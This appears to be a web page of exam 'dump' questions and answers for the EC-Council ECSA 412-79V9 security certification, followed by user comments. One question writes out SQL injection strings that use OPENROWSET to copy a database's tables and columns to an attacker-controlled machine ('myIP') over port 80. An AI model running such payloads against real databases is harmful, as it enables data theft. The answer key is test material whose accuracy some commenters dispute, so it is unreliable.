EC-Council Certified Security Analyst (ECSA) v9 412-79V9 Dumps in PDF

Free EC-Council 412-79V9 Real Questions (page: 2)

Which of the following approaches to vulnerability assessment relies on the administrator providing baseline of system configuration and then scanning continuously without incorporating any information found at the time of scanning?

  1. Service-based Assessment Solutions
  2. Product-based Assessment Solutions
  3. Tree-based Assessment
  4. Inference-based Assessment

Answer(s): C


Reference:

http://www.netsense.info/downloads/security_wp_mva.pdf (page 12, tree-based assessment technology, second para)



Today, most organizations would agree that their most valuable IT assets reside within applications and databases. Most would probably also agree that these are areas that have the weakest levels of security, thus making them the prime target for malicious activity from system administrators, DBAs, contractors, consultants, partners, and customers.



Which of the following flaws refers to an application using poorly written encryption code to securely encrypt and store sensitive data in the database and allows an attacker to steal or modify weakly protected data such as credit card numbers, SSNs, and other authentication credentials?

  1. SSI injection attack
  2. Insecure cryptographic storage attack
  3. Hidden field manipulation attack
  4. Man-in-the-Middle attack

Answer(s): B



A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to his machine by via a connection to the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET
('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases ­
The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 80;', 'select * from
mydatabase..table1') select * from database..table1 ­
What query does he need in order to transfer the column?

  1. '; insert into
    OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 8 0;', 'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables ­
  2. '; insert into
    OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 8 0;', 'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows ­
  3. '; insert into
    OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 8 0;', 'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns ­
  4. '; insert into
    OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP, 8 0;', 'select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns ­

Answer(s): C



Packet filtering firewalls are usually a part of a router. In a packet filtering firewall, each packet is compared to a set of criteria before it is forwarded.
Depending on the packet and the criteria, the firewall can:

i). Drop the packet
ii). Forward it or send a message to the originator



At which level of the OSI model do the packet filtering firewalls work?

  1. Application layer
  2. Physical layer
  3. Transport layer
  4. Network layer

Answer(s): D


Reference:

http://books.google.com.pk/books?id=KPjLAyA7HgoC&pg=PA208&lpg=PA208&dq=At+whi ch+level+of+the+OSI+model+do+the+packet+filtering+firewalls+work&source=bl&ots=zRrb cmY3pj&sig=I3vuS3VA7r-3VF8lC6xq_c_r31M&hl=en&sa=X&ei=wMcfVMetI8HPaNSRgPgD&ved=0CC8Q6AEwAg#v=onepage&q=At%20which%20level%20of%20the%20OSI%20model%20do%20the%20pa cket%20filtering%20firewalls%20work&f=false (packet filters)



An antenna is a device that is designed to transmit and receive the electromagnetic waves that are generally called radio waves. Which one of the following types of antenna is developed from waveguide technology?

  1. Leaky Wave Antennas
  2. Aperture Antennas
  3. Reflector Antenna
  4. Directional Antenna

Answer(s): B



Firewall and DMZ architectures are characterized according to its design. Which one of the following architectures is used when routers have better high-bandwidth data stream handling capacity?

  1. Weak Screened Subnet Architecture
  2. "Inside Versus Outside" Architecture
  3. "Three-Homed Firewall" DMZ Architecture
  4. Strong Screened-Subnet Architecture

Answer(s): A



Which one of the following tools of trade is a commercial shellcode and payload generator written in Python by Dave Aitel?

  1. Microsoft Baseline Security Analyzer (MBSA)
  2. CORE Impact
  3. Canvas
  4. Network Security Analysis Tool (NSAT)

Answer(s): C



Internet Control Message Protocol (ICMP) messages occur in many situations, such as whenever a datagram cannot reach the destination or the gateway does not have the buffering capacity to forward a datagram. Each ICMP message contains three fields: type, code, and checksum. Different types of Internet Control Message Protocols (ICMPs) are identified by a TYPE field. If the destination is not reachable, which one of the following are generated?

  1. Type 8 ICMP codes
  2. Type 12 ICMP codes
  3. Type 3 ICMP codes
  4. Type 7 ICMP codes

Answer(s): C



Share your comments for EC-Council 412-79V9 exam with other users:

H
Hiren Ladva
7/8/2023 10:34:00 PM

yes i m prepared exam

O
oliverjames
10/24/2023 5:37:00 AM

my experience was great with this site as i studied for the ms-900 from here and got 900/1000 on the test. my main focus was on the tutorials which were provided and practice questions. thanks!

B
Bhuddhiman
7/20/2023 11:52:00 AM

great course

A
Anuj
1/14/2024 4:07:00 PM

very good question

S
Saravana Kumar TS
12/8/2023 9:49:00 AM

question: 93 which statement is true regarding the result? sales contain 6 columns and values contain 7 columns so c is not right answer.

L
Lue
3/30/2023 11:43:00 PM

highly recommend just passed my exam.

D
DC
1/7/2024 10:17:00 AM

great practice! thanks

A
Anonymus
11/9/2023 5:41:00 AM

anyone who wrote this exam recently?

K
Khalid Javid
11/17/2023 3:46:00 PM

kindly share the dump

N
Na
8/9/2023 8:39:00 AM

could you please upload cfe fraud prevention and deterrence questions? it will be very much helpful.

S
shime
10/23/2023 10:03:00 AM

this is really very very helpful for mcd level 1

V
Vnu
6/3/2023 2:39:00 AM

very helpful!

S
Steve
8/17/2023 2:19:00 PM

question #18s answer should be a, not d. this should be corrected. it should be minvalidityperiod

R
RITEISH
12/24/2023 4:33:00 AM

thanks for the exact solution

S
SB
10/15/2023 7:58:00 AM

need to refer the questions and have to give the exam

M
Mike Derfalem
7/16/2023 7:59:00 PM

i need it right now if it was possible please

I
Isak
7/6/2023 3:21:00 AM

i need it very much please share it in the fastest time.

M
Maria
6/23/2023 11:40:00 AM

correct answer is d for student.java program

N
Nagendra Pedipina
7/12/2023 9:10:00 AM

q:37 c is correct

J
John
9/16/2023 9:37:00 PM

q6 exam topic: terramearth, c: correct answer: copy 1petabyte to encrypted usb device ???

S
SAM
12/4/2023 12:56:00 AM

explained answers

A
Andy
12/26/2023 9:35:00 PM

plan to take theaws certified developer - associate dva-c02 in the next few weeks

S
siva
5/17/2023 12:32:00 AM

very helpfull

M
mouna
9/27/2023 8:53:00 AM

good questions

B
Bhavya
9/12/2023 7:18:00 AM

help to practice csa exam

M
Malik
9/28/2023 1:09:00 PM

nice tip and well documented

R
rodrigo
6/22/2023 7:55:00 AM

i need the exam

D
Dan
6/29/2023 1:53:00 PM

please upload

A
Ale M
11/22/2023 6:38:00 PM

prepping for fsc exam

A
ahmad hassan
9/6/2023 3:26:00 AM

pd1 with great experience

Ž
Žarko
9/5/2023 3:35:00 AM

@t it seems like azure service bus message quesues could be the best solution

S
Shiji
10/15/2023 1:08:00 PM

helpful to check your understanding.

D
Da Costa
8/27/2023 11:43:00 AM

question 128 the answer should be static not auto

B
bot
7/26/2023 6:45:00 PM

more comments here

AI Tutor 👋 I’m here to help!